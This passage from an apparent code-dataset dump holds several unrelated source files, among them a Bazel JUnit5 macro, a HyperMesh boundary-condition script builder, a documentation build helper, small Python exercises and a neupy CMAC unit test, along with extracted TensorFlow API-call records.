'[3, 1, 2, 0, 4]'], {}), '(transformed, [3, 1, 2, 0, 4])\n', (15990, 16020), True, 'import tensorflow as tf\n'), ((16037, 16069), 'tensorflow.unstack', 'tf.unstack', (['transformed'], {'axis': '(-1)'}), '(transformed, axis=-1)\n', (16047, 16069), True, 'import tensorflow as tf\n'), ((16458, 16510), 'tensorflow.pad', 'tf.pad', (['prev_image', '[[0, 0], [2, 2], [2, 2], [0, 0]]'], {}), '(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])\n', (16464, 16510), True, 'import tensorflow as tf\n'), ((16883, 16915), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': 'inputs'}), '(axis=3, values=inputs)\n', (16892, 16915), True, 'import tensorflow as tf\n'), ((17116, 17168), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['(kernel * inputs)', '[3]'], {'keep_dims': '(False)'}), '(kernel * inputs, [3], keep_dims=False)\n', (17129, 17168), True, 'import tensorflow as tf\n'), ((17885, 17928), 'tensorflow.gather', 'tf.gather', (['ground_truth_x', 'ground_truth_idx'], {}), '(ground_truth_x, ground_truth_idx)\n', (17894, 17928), True, 'import tensorflow as tf\n'), ((17950, 17987), 'tensorflow.gather', 'tf.gather', (['generated_x', 'generated_idx'], {}), '(generated_x, generated_idx)\n', (17959, 17987), True, 'import tensorflow as tf\n'), ((17997, 18094), 'tensorflow.dynamic_stitch', 'tf.dynamic_stitch', (['[ground_truth_idx, generated_idx]', '[ground_truth_examps, generated_examps]'], {}), '([ground_truth_idx, generated_idx], [ground_truth_examps,\n generated_examps])\n', (18014, 18094), True, 'import tensorflow as tf\n'), ((2297, 2339), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.conv2d]'], {'reuse': '(False)'}), '([slim.conv2d], reuse=False)\n', (2311, 2339), True, 'import tensorflow.contrib.slim as slim\n'), ((2362, 2382), 'tensorflow.concat', 'tf.concat', (['images', '(3)'], {}), '(images, 3)\n', (2371, 2382), True, 'import tensorflow as tf\n'), ((2402, 2562), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['stacked_images', '(32)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm1'}"}), "(stacked_images, 32, [3, 3], stride=2, scope='latent_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm1'})\n", (2413, 2562), True, 'import tensorflow.contrib.slim as slim\n'), ((2623, 2780), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc1', '(64)', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_conv2"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm2'}"}), "(latent_enc1, 64, [3, 3], stride=2, scope='latent_conv2',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm2'})\n", (2634, 2780), True, 'import tensorflow.contrib.slim as slim\n'), ((2841, 2998), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc2', '(64)', '[3, 3]'], {'stride': '(1)', 'scope': '"""latent_conv3"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm3'}"}), "(latent_enc2, 64, [3, 3], stride=1, scope='latent_conv3',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'latent_norm3'})\n", (2852, 2998), True, 'import tensorflow.contrib.slim as slim\n'), ((3059, 3259), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'activation_fn': 'None', 'scope': '"""latent_mean"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_norm_mean'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2,\n activation_fn=None, scope='latent_mean', normalizer_fn=tf_layers.\n layer_norm, normalizer_params={'scope': 'latent_norm_mean'})\n", (3070, 3259), True, 'import tensorflow.contrib.slim as slim\n'), ((3326, 3505), 'tensorflow.contrib.slim.conv2d', 'slim.conv2d', (['latent_enc3', 'FLAGS.latent_channels', '[3, 3]'], {'stride': '(2)', 'scope': '"""latent_std"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'latent_std_norm'}"}), "(latent_enc3, FLAGS.latent_channels, [3, 3], stride=2, scope=\n 'latent_std', normalizer_fn=tf_layers.layer_norm, normalizer_params={\n 'scope': 'latent_std_norm'})\n", (3337, 3505), True, 'import tensorflow.contrib.slim as slim\n'), ((3660, 3686), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['divergence'], {}), '(divergence)\n', (3674, 3686), True, 'import tensorflow as tf\n'), ((3769, 3862), 'tensorflow.random_normal', 'tf.random_normal', (['([FLAGS.sequence_length - 1] + latent_mean.shape)', '(0)', '(1)'], {'dtype': 'tf.float32'}), '([FLAGS.sequence_length - 1] + latent_mean.shape, 0, 1,\n dtype=tf.float32)\n', (3785, 3862), True, 'import tensorflow as tf\n'), ((3927, 3986), 'tensorflow.random_normal', 'tf.random_normal', (['latent_mean.shape', '(0)', '(1)'], {'dtype': 'tf.float32'}), '(latent_mean.shape, 0, 1, dtype=tf.float32)\n', (3943, 3986), True, 'import tensorflow as tf\n'), ((5811, 5829), 'tensorflow.identity', 'tf.identity', (['image'], {}), '(image)\n', (5822, 5829), True, 'import tensorflow as tf\n'), ((6488, 6527), 'numpy.array', 'np.array', (['[32, 32, 64, 64, 128, 64, 32]'], {}), '([32, 32, 64, 64, 128, 64, 32])\n', (6496, 6527), True, 'import numpy as np\n'), ((13722, 13774), 'numpy.array', 'np.array', (['[1.0, 0.0, 0.0, 0.0, 1.0, 0.0]', 'np.float32'], {}), '([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32)\n', (13730, 13774), True, 'import numpy as np\n'), ((15047, 15082), 'tensorflow.nn.relu', 'tf.nn.relu', (['(cdna_kerns - RELU_SHIFT)'], {}), '(cdna_kerns - RELU_SHIFT)\n', (15057, 15082), True, 'import tensorflow as tf\n'), ((16957, 16991), 'tensorflow.nn.relu', 'tf.nn.relu', (['(dna_input - RELU_SHIFT)'], {}), '(dna_input - RELU_SHIFT)\n', (16967, 16991), True, 'import tensorflow as tf\n'), ((17754, 17780), 'tensorflow.range', 'tf.range', (['num_ground_truth'], {}), '(num_ground_truth)\n', (17762, 17780), True, 'import tensorflow as tf\n'), ((7085, 7230), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[lstm_func, slim.layers.conv2d, slim.layers.fully_connected, tf_layers.\n layer_norm, slim.layers.conv2d_transpose]'], {'reuse': 'reuse'}), '([lstm_func, slim.layers.conv2d, slim.layers.fully_connected,\n tf_layers.layer_norm, slim.layers.conv2d_transpose], reuse=reuse)\n', (7099, 7230), True, 'import tensorflow.contrib.slim as slim\n'), ((7696, 7745), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(1)', 'values': '[action, current_state]'}), '(axis=1, values=[action, current_state])\n', (7705, 7745), True, 'import tensorflow as tf\n'), ((7760, 7922), 'tensorflow.contrib.slim.layers.conv2d', 'slim.layers.conv2d', (['prev_image', '(32)', '[5, 5]'], {'stride': '(2)', 'scope': '"""scale1_conv1"""', 'normalizer_fn': 'tf_layers.layer_norm', 'normalizer_params': "{'scope': 'layer_norm1'}"}), "(prev_image, 32, [5, 5], stride=2, scope='scale1_conv1',\n normalizer_fn=tf_layers.layer_norm, normalizer_params={'scope':\n 'layer_norm1'})\n", (7778, 7922), True, 'import tensorflow.contrib.slim as slim\n'), ((8092, 8142), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden1'], {'scope': '"""layer_norm2"""'}), "(hidden1, scope='layer_norm2')\n", (8112, 8142), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8261, 8311), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden2'], {'scope': '"""layer_norm3"""'}), "(hidden2, scope='layer_norm3')\n", (8281, 8311), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8537, 8587), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden3'], {'scope': '"""layer_norm4"""'}), "(hidden3, scope='layer_norm4')\n", (8557, 8587), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((8706, 8756), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden4'], {'scope': '"""layer_norm5"""'}), "(hidden4, scope='layer_norm5')\n", (8726, 8756), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((9935, 9985), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden5'], {'scope': '"""layer_norm6"""'}), "(hidden5, scope='layer_norm6')\n", (9955, 9985), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10226, 10276), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden6'], {'scope': '"""layer_norm7"""'}), "(hidden6, scope='layer_norm7')\n", (10246, 10276), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10318, 10359), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden6, enc1]'}), '(axis=3, values=[hidden6, enc1])\n', (10327, 10359), True, 'import tensorflow as tf\n'), ((10614, 10664), 'tensorflow.contrib.layers.python.layers.layer_norm', 'tf_layers.layer_norm', (['hidden7'], {'scope': '"""layer_norm8"""'}), "(hidden7, scope='layer_norm8')\n", (10634, 10664), True, 'from tensorflow.contrib.layers.python import layers as tf_layers\n'), ((10707, 10748), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[hidden7, enc0]'}), '(axis=3, values=[hidden7, enc0])\n', (10716, 10748), True, 'import tensorflow as tf\n'), ((12360, 12463), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(num_masks + 1)', '(1)'], {'stride': '(1)', 'scope': '"""convt7"""', 'activation_fn': 'None'}), "(enc6, num_masks + 1, 1, stride=1, scope=\n 'convt7', activation_fn=None)\n", (12388, 12463), True, 'import tensorflow.contrib.slim as slim\n'), ((12656, 12719), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(num_masks + 1)', 'value': 'masks'}), '(axis=3, num_or_size_splits=num_masks + 1, value=masks)\n', (12664, 12719), True, 'import tensorflow as tf\n'), ((13990, 14021), 'spatial_transformer.transformer', 'transformer', (['prev_image', 'params'], {}), '(prev_image, params)\n', (14001, 14021), False, 'from spatial_transformer import transformer\n'), ((17047, 17089), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['kernel', '[3]'], {'keep_dims': '(True)'}), '(kernel, [3], keep_dims=True)\n', (17060, 17089), True, 'import tensorflow as tf\n'), ((1452, 1469), 'tensorflow.exp', 'tf.exp', (['log_sigma'], {}), '(log_sigma)\n', (1458, 1469), True, 'import tensorflow as tf\n'), ((9155, 9194), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[enc2, smear]'}), '(axis=3, values=[enc2, smear])\n', (9164, 9194), True, 'import tensorflow as tf\n'), ((11112, 11220), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', '(DNA_KERN_SIZE ** 2)', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, DNA_KERN_SIZE ** 2, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11140, 11220), True, 'import tensorflow.contrib.slim as slim\n'), ((11325, 11429), 'tensorflow.contrib.slim.layers.conv2d_transpose', 'slim.layers.conv2d_transpose', (['enc6', 'color_channels', '(1)'], {'stride': '(1)', 'scope': '"""convt4"""', 'activation_fn': 'None'}), "(enc6, color_channels, 1, stride=1, scope=\n 'convt4', activation_fn=None)\n", (11353, 11429), True, 'import tensorflow.contrib.slim as slim\n'), ((11728, 11788), 'tensorflow.contrib.slim.layers.fully_connected', 'slim.layers.fully_connected', (['stp_input0', '(100)'], {'scope': '"""fc_stp"""'}), "(stp_input0, 100, scope='fc_stp')\n", (11755, 11788), True, 'import tensorflow.contrib.slim as slim\n'), ((1436, 1449), 'tensorflow.square', 'tf.square', (['mu'], {}), '(mu)\n', (1445, 1449), True, 'import tensorflow as tf\n'), ((6349, 6372), 'tensorflow.to_float', 'tf.to_float', (['batch_size'], {}), '(batch_size)\n', (6360, 6372), True, 'import tensorflow as tf\n'), ((9611, 9644), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['[latent]'], {}), '([latent])\n', (9634, 9644), True, 'import tensorflow as tf\n'), ((9663, 9691), 'tensorflow.concat', 'tf.concat', (['[enc2, latent]', '(3)'], {}), '([enc2, latent], 3)\n', (9672, 9691), True, 'import tensorflow as tf\n'), ((11607, 11626), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['enc7'], {}), '(enc7)\n', (11620, 11626), True, 'import tensorflow as tf\n'), ((12520, 12558), 'tensorflow.reshape', 'tf.reshape', (['masks', '[-1, num_masks + 1]'], {}), '(masks, [-1, num_masks + 1])\n', (12530, 12558), True, 'import tensorflow as tf\n'), ((16758, 16845), 'tensorflow.slice', 'tf.slice', (['prev_image_pad', '[0, xkern, ykern, 0]', '[-1, image_height, image_width, -1]'], {}), '(prev_image_pad, [0, xkern, ykern, 0], [-1, image_height,\n image_width, -1])\n', (16766, 16845), True, 'import tensorflow as tf\n'), ((6385, 6405), 'tensorflow.exp', 'tf.exp', (['(iter_num / k)'], {}), '(iter_num / k)\n', (6391, 6405), True, 'import tensorflow as tf\n'), ((9493, 9512), 'tensorflow.identity', 'tf.identity', (['latent'], {}), '(latent)\n', (9504, 9512), True, 'import tensorflow as tf\n'), ((9563, 9587), 'tensorflow.exp', 'tf.exp', (['(latent_std / 2.0)'], {}), '(latent_std / 2.0)\n', (9569, 9587), True, 'import tensorflow as tf\n')]
prashantsharma04/bazel_java_rules
junit5/rules.bzl
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
load("@rules_jvm_external//:defs.bzl", "artifact") # For more information see # - https://github.com/bmuschko/bazel-examples/blob/master/java/junit5-test/BUILD # - https://github.com/salesforce/bazel-maven-proxy/tree/master/tools/junit5 # - https://github.com/junit-team/junit5-samples/tree/master/junit5-jupiter-starter-bazel def junit5_test(name, srcs, test_package, resources = [], deps = [], runtime_deps = [], **kwargs): """JUnit runner macro""" FILTER_KWARGS = [ "main_class", "use_testrunner", "args", ] for arg in FILTER_KWARGS: if arg in kwargs.keys(): kwargs.pop(arg) junit_console_args = [] if test_package: junit_console_args += ["--select-package", test_package] else: fail("must specify 'test_package'") native.java_test( name = name, srcs = srcs, use_testrunner = False, main_class = "org.junit.platform.console.ConsoleLauncher", args = junit_console_args, deps = deps + [ artifact("org.junit.jupiter:junit-jupiter-api"), artifact("org.junit.jupiter:junit-jupiter-params"), artifact("org.junit.jupiter:junit-jupiter-engine"), artifact("org.hamcrest:hamcrest-library"), artifact("org.hamcrest:hamcrest-core"), artifact("org.hamcrest:hamcrest"), artifact("org.mockito:mockito-core"), ], visibility = ["//java:__subpackages__"], resources = resources, runtime_deps = runtime_deps + [ artifact("org.junit.platform:junit-platform-console"), ], **kwargs )
[]
fangedward/pylot
tests/mocked_carla.py
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
# This module provides mocked versions of classes and functions provided # by Carla in our runtime environment. class Location(object): """ A mock class for carla.Location. """ def __init__(self, x, y, z): self.x = x self.y = y self.z = z class Rotation(object): """ A mock class for carla.Rotation. """ def __init__(self, pitch, yaw, roll): self.pitch = pitch self.yaw = yaw self.roll = roll class Vector3D(object): """ A mock class for carla.Vector3D. """ def __init__(self, x, y, z): self.x = x self.y = y self.z = z
[]
Zweizack/fuzzy-rainbow
rgb_to_cmyk.py
f69f7eb59971d28a9093a03c1911b41e23cddf2a
#!/usr/bin/env python3 # -*- coding: utf-8 -*- ee = '\033[1m' green = '\033[32m' yellow = '\033[33m' cyan = '\033[36m' line = cyan+'-' * 0x2D print(ee+line) R,G,B = [float(X) / 0xFF for X in input(f'{yellow}RGB: {green}').split()] K = 1-max(R,G,B) C,M,Y = [round(float((1-X-K)/(1-K) * 0x64),1) for X in [R,G,B]] K = round(K * 0x64,1) print(f'{yellow}CMYK: {green}{C}%, {M}%, {Y}%, {K}%') print(line)
[]
JukeboxPipeline/jukedj
docs/updatedoc.py
d4159961c819c26792a278981ee68106ee15f3f3
#!/usr/bin/env python """Builds the documentaion. First it runs gendoc to create rst files for the source code. Then it runs sphinx make. .. Warning:: This will delete the content of the output directory first! So you might loose data. You can use updatedoc.py -nod. Usage, just call:: updatedoc.py -h """ import argparse import os import shutil import sys import gendoc thisdir = os.path.abspath(os.path.dirname(__file__)) def setup_argparse(): """Sets up the argument parser and returns it :returns: the parser :rtype: :class:`argparse.ArgumentParser` :raises: None """ parser = argparse.ArgumentParser( description="Builds the documentaion. First it runs gendoc to create rst files\ for the source code. Then it runs sphinx make.\ WARNING: this will delete the contents of the output dirs. You can use -nod.") ipath = os.path.join(thisdir, '../src') ipath = os.path.abspath(ipath) idefault = [ipath] parser.add_argument('-i', '--input', nargs='+', default=idefault, help='list of input directories. gendoc is called for every\ source dir.\ Default is \'%s\'.' % ', '.join(idefault)) opath = os.path.join(thisdir, 'reference') opath = os.path.abspath(opath) odefault = [opath] parser.add_argument('-o', '--output', nargs='+', default=odefault, help='list of output directories. if you have multiple source\ directories, the corresponding output directorie is used.\ if there are less dirs than for source, the last output dir\ is used for the remaining source dirs.\ WARNING: the output directories are emptied by default. See -nod.\ Default is \'%s\'.' % ', '.join(odefault)) gadefault = ['-T', '-f', '-e', '-o'] parser.add_argument('-ga', '--gendocargs', nargs='*', default=gadefault, help="list of arguments to pass to gendoc. use -gh for info.\ Default is \'%s\'" % ', '.join(gadefault)) parser.add_argument('-nod', '--nodelete', action='store_true', help='Do not empty the output directories first.') parser.add_argument('-gh', '--gendochelp', action='store_true', help='print the help for gendoc and exit') return parser def prepare_dir(directory, delete=True): """Create apidoc dir, delete contents if delete is True. :param directory: the apidoc directory. you can use relative paths here :type directory: str :param delete: if True, deletes the contents of apidoc. This acts like an override switch. :type delete: bool :returns: None :rtype: None :raises: None """ if os.path.exists(directory): if delete: assert directory != thisdir, 'Trying to delete docs! Specify other output dir!' print 'Deleting %s' % directory shutil.rmtree(directory) print 'Creating %s' % directory os.mkdir(directory) else: print 'Creating %s' % directory os.mkdir(directory) def run_gendoc(source, dest, args): """Starts gendoc which reads source and creates rst files in dest with the given args. :param source: The python source directory for gendoc. Can be a relative path. :type source: str :param dest: The destination for the rst files. Can be a relative path. :type dest: str :param args: Arguments for gendoc. See gendoc for more information. :type args: list :returns: None :rtype: None :raises: SystemExit """ args.insert(0, 'gendoc.py') args.append(dest) args.append(source) print 'Running gendoc.main with: %s' % args gendoc.main(args) def main(argv=sys.argv[1:]): """Parse commandline arguments and run the tool :param argv: the commandline arguments. :type argv: list :returns: None :rtype: None :raises: None """ parser = setup_argparse() args = parser.parse_args(argv) if args.gendochelp: sys.argv[0] = 'gendoc.py' genparser = gendoc.setup_parser() genparser.print_help() sys.exit(0) print 'Preparing output directories' print '='*80 for odir in args.output: prepare_dir(odir, not args.nodelete) print '\nRunning gendoc' print '='*80 for i, idir in enumerate(args.input): if i >= len(args.output): odir = args.output[-1] else: odir = args.output[i] run_gendoc(idir, odir, args.gendocargs) if __name__ == '__main__': main()
[]
vitormrts/sorting-algorithms
sort/selectionsort.py
5571ce522a7fd33f976fa05b264ed2c253c221b3
def selection_sort(A): # O(n^2) n = len(A) for i in range(n-1): # percorre a lista min = i for j in range(i+1, n): # encontra o menor elemento da lista a partir de i + 1 if A[j] < A[min]: min = j A[i], A[min] = A[min], A[i] # insere o elemento na posicao correta return A # 1 + (n-1)*[3 + X] = 1 + 3*(n-1) + X*(n-1) = 1 + 3*(n-1) + (n^2 + n - 2)/2 # = (1 - 3 - 1) + (3n + n/2) + (n^2/2) # The complexity is O(n^2)
[]
manuel1618/bridgeOptimizer
BridgeOptimizer/scriptBuilder/ScriptBuilderBoundaryConditions.py
273bbf27b2c6273e4aaca55debbd9a10bebf7042
import os from typing import List, Tuple from BridgeOptimizer.datastructure.hypermesh.LoadCollector import LoadCollector from BridgeOptimizer.datastructure.hypermesh.LoadStep import LoadStep from BridgeOptimizer.datastructure.hypermesh.Force import Force from BridgeOptimizer.datastructure.hypermesh.SPC import SPC class ScriptBuilderBoundaryConditions: """ Extra class for generating Loadstep, Loadcollectors, Forces and Constraints Parameters: --------- None """ def __init__(self) -> None: pass def write_tcl_commands_loadCollectors(self, tcl_commands: List) -> None: """ Creates all the load collectors (has to be done before creating loadsteps, as the loadcollectors are referenced) """ load_collector: LoadCollector = None # create all load collectors and loads first for load_collector in LoadCollector.instances: load_collector_type = load_collector.get_load_collector_type() load_collector.name = f"{str(load_collector_type.__name__)}_{str(load_collector.get_id())}" tcl_commands.append( f"*createentity loadcols includeid=0 name=\"{load_collector.name}\"") # create loads for load in load_collector.loads: if load_collector_type == Force: force: Force = load tcl_commands.append( f"*createmark nodes 1 {' '.join([str(x) for x in force.nodeIds])}") tcl_commands.append( f"*loadcreateonentity_curve nodes 1 1 1 {force.x} {force.y} {force.z} 0 {force.x} {force.y} {force.z} 0 0 0 0") elif load_collector_type == SPC: spc: SPC = load tcl_commands.append( f"*createmark nodes 1 {' '.join([str(x) for x in spc.nodeIds])}") tcl_commands.append( f"*loadcreateonentity_curve nodes 1 3 1 {spc.dofs[0]} {spc.dofs[1]} {spc.dofs[2]} {spc.dofs[3]} {spc.dofs[4]} {spc.dofs[5]} 0 0 0 0 0") tcl_commands.append("*createmark loads 0 1") tcl_commands.append("*loadsupdatefixedvalue 0 0") def write_tcl_commands_loadsteps(self, tcl_commands: List) -> None: """ Single method to write all tcl commands to the file """ self.write_tcl_commands_loadCollectors(tcl_commands) # create the load step load_step: LoadStep = None for load_step in LoadStep.instances: load_step_id = str(load_step.get_id()) # TODO: should be possible to just use a spc collector - not possible rn. spc_loadCollector = load_step.spc_loadCollector load_loadCollector = load_step.load_loadCollector spc_loadCollector_id = str(spc_loadCollector.get_id()) load_loadCollector_id = str(load_loadCollector.get_id()) tcl_commands.append( f"*createmark loadcols 1 \"{spc_loadCollector.name}\" \"{load_loadCollector.name}\"") tcl_commands.append("*createmark outputblocks 1") tcl_commands.append("*createmark groups 1") tcl_commands.append( f"*loadstepscreate \"loadstep_{load_step_id}\" 1") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 4143 1 1 0 1") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 4709 1 1 0 1") tcl_commands.append( f"*setvalue loadsteps id={load_step_id} STATUS=2 4059=1 4060=STATICS") tcl_commands.append( f"*attributeupdateentity loadsteps {load_step_id} 4145 1 1 0 loadcols {spc_loadCollector_id}") tcl_commands.append( f"*attributeupdateentity loadsteps {load_step_id} 4147 1 1 0 loadcols {load_loadCollector_id}") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 3800 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 707 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 2396 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 8134 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 2160 1 1 0 0") tcl_commands.append( f"*attributeupdateint loadsteps {load_step_id} 10212 1 1 0 0")
[]
islamspahic/python-uup
Lekcija08/script01.py
ea7c9c655ad8e678bca5ee52138836732266799f
tajniBroj = 51 broj = 2 while tajniBroj != broj: broj = int(input("Pogodite tajni broj: ")) if tajniBroj == broj: print("Pogodak!") elif tajniBroj < broj: print("Tajni broj je manji od tog broja.") else: print("Tajni broj je veci od tog broja.") print("Kraj programa")
[]
FrostByte266/neupy
tests/algorithms/memory/test_cmac.py
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
import numpy as np from sklearn import metrics from neupy import algorithms from base import BaseTestCase class CMACTestCase(BaseTestCase): def test_cmac(self): X_train = np.reshape(np.linspace(0, 2 * np.pi, 100), (100, 1)) X_train_before = X_train.copy() X_test = np.reshape(np.linspace(np.pi, 2 * np.pi, 50), (50, 1)) y_train = np.sin(X_train) y_train_before = y_train.copy() y_test = np.sin(X_test) cmac = algorithms.CMAC( quantization=100, associative_unit_size=32, step=0.2, verbose=False, ) cmac.train(X_train, y_train, epochs=100) predicted_test = cmac.predict(X_test) predicted_test = predicted_test.reshape((len(predicted_test), 1)) error = metrics.mean_absolute_error(y_test, predicted_test) self.assertAlmostEqual(error, 0.0024, places=4) # Test that algorithm didn't modify data samples np.testing.assert_array_equal(X_train, X_train_before) np.testing.assert_array_equal(X_train, X_train_before) np.testing.assert_array_equal(y_train, y_train_before) self.assertPickledNetwork(cmac, X_train) def test_train_different_inputs(self): self.assertInvalidVectorTrain( network=algorithms.CMAC(), input_vector=np.array([1, 2, 3]), target=np.array([1, 2, 3]) ) def test_predict_different_inputs(self): cmac = algorithms.CMAC() data = np.array([[1, 2, 3]]).T target = np.array([[1, 2, 3]]).T cmac.train(data, target, epochs=100) self.assertInvalidVectorPred( network=cmac, input_vector=np.array([1, 2, 3]), target=target, decimal=2 ) def test_cmac_multi_output(self): X_train = np.linspace(0, 2 * np.pi, 100) X_train = np.vstack([X_train, X_train]) X_test = np.linspace(0, 2 * np.pi, 100) X_test = np.vstack([X_test, X_test]) y_train = np.sin(X_train) y_test = np.sin(X_test) cmac = algorithms.CMAC( quantization=100, associative_unit_size=32, step=0.2, ) cmac.train(X_train, y_train, X_test, y_test, epochs=100) predicted_test = cmac.predict(X_test) error = metrics.mean_absolute_error(y_test, predicted_test) self.assertAlmostEqual(error, 0, places=6) def test_cmac_training_exceptions(self): cmac = algorithms.CMAC( quantization=100, associative_unit_size=32, step=0.2, ) with self.assertRaises(ValueError): cmac.train(X_train=True, y_train=True, X_test=None, y_test=True)
[((371, 386), 'numpy.sin', 'np.sin', (['X_train'], {}), '(X_train)\n', (377, 386), True, 'import numpy as np\n'), ((444, 458), 'numpy.sin', 'np.sin', (['X_test'], {}), '(X_test)\n', (450, 458), True, 'import numpy as np\n'), ((475, 563), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {'quantization': '(100)', 'associative_unit_size': '(32)', 'step': '(0.2)', 'verbose': '(False)'}), '(quantization=100, associative_unit_size=32, step=0.2,\n verbose=False)\n', (490, 563), False, 'from neupy import algorithms\n'), ((805, 856), 'sklearn.metrics.mean_absolute_error', 'metrics.mean_absolute_error', (['y_test', 'predicted_test'], {}), '(y_test, predicted_test)\n', (832, 856), False, 'from sklearn import metrics\n'), ((980, 1034), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['X_train', 'X_train_before'], {}), '(X_train, X_train_before)\n', (1009, 1034), True, 'import numpy as np\n'), ((1043, 1097), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['X_train', 'X_train_before'], {}), '(X_train, X_train_before)\n', (1072, 1097), True, 'import numpy as np\n'), ((1106, 1160), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y_train', 'y_train_before'], {}), '(y_train, y_train_before)\n', (1135, 1160), True, 'import numpy as np\n'), ((1489, 1506), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {}), '()\n', (1504, 1506), False, 'from neupy import algorithms\n'), ((1860, 1890), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (1871, 1890), True, 'import numpy as np\n'), ((1909, 1938), 'numpy.vstack', 'np.vstack', (['[X_train, X_train]'], {}), '([X_train, X_train])\n', (1918, 1938), True, 'import numpy as np\n'), ((1957, 1987), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (1968, 1987), True, 'import numpy as np\n'), ((2005, 2032), 'numpy.vstack', 'np.vstack', (['[X_test, X_test]'], {}), '([X_test, X_test])\n', (2014, 2032), True, 'import numpy as np\n'), ((2052, 2067), 'numpy.sin', 'np.sin', (['X_train'], {}), '(X_train)\n', (2058, 2067), True, 'import numpy as np\n'), ((2085, 2099), 'numpy.sin', 'np.sin', (['X_test'], {}), '(X_test)\n', (2091, 2099), True, 'import numpy as np\n'), ((2116, 2185), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {'quantization': '(100)', 'associative_unit_size': '(32)', 'step': '(0.2)'}), '(quantization=100, associative_unit_size=32, step=0.2)\n', (2131, 2185), False, 'from neupy import algorithms\n'), ((2379, 2430), 'sklearn.metrics.mean_absolute_error', 'metrics.mean_absolute_error', (['y_test', 'predicted_test'], {}), '(y_test, predicted_test)\n', (2406, 2430), False, 'from sklearn import metrics\n'), ((2544, 2613), 'neupy.algorithms.CMAC', 'algorithms.CMAC', ([], {'quantization': '(100)', 'associative_unit_size': '(32)', 'step': '(0.2)'}), '(quantization=100, associative_unit_size=32, step=0.2)\n', (2559, 2613), False, 'from neupy import algorithms\n'), ((197, 227), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (208, 227), True, 'import numpy as np\n'), ((308, 341), 'numpy.linspace', 'np.linspace', (['np.pi', '(2 * np.pi)', '(50)'], {}), '(np.pi, 2 * np.pi, 50)\n', (319, 341), True, 'import numpy as np\n'), ((1523, 1544), 'numpy.array', 'np.array', 